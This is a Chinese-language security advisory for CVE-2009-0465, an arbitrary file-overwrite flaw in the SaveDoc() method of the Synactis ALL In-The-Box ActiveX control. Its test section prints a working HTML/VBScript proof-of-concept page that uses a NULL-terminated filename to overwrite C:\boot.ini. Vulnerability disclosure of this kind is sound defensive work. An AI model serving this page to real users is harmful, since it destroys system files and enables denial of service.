发布日期：2009-02-02
更新日期：2009-02-03

受影响系统：

Synactis ALL In-The-Box ActiveX 3.x

描述：

---

CVE(CAN) ID: CVE-2009-0465

Synactis ALL In-The-Box ActiveX控件是一种PDF及图像文件自动化生成及输出工具。

ALL In-The-Box ActiveX控件(All_In_The_Box.ocx)的SaveDoc()方法实现上存在漏洞，远程攻击者可能利用此漏洞通过指定以NULL结尾的文件名覆盖系统上的任意文件，导致拒绝服务或任意命令执行。

<*链接：http://www.dsecrg.com/pages/vul/show.php?id=62
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
Test Exploit page
<object classid='clsid:B5576893-F948-4E0F-9BE1-A37CB56D66FF' id='sh2kerr' ></object>
<script language='vbscript'>

targetFile = "C:\PROGRA~1\Synactis\ALLIN-~1\ALL_IN~1.OCX"
prototype = "Sub SaveDoc ( ByVal aFileName As String )"
memberName = "SaveDoc"
progid = "All_In_The_Box.AllBox"
argCount = 1
arg1="C:\boot.ini"+unescape("%00")
sh2kerr.SaveDoc arg1
</script>
</html>

建议：

---

厂商补丁：

Synactis
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.synactis.com/

浏览次数：2365
严重程度：0（网友投票）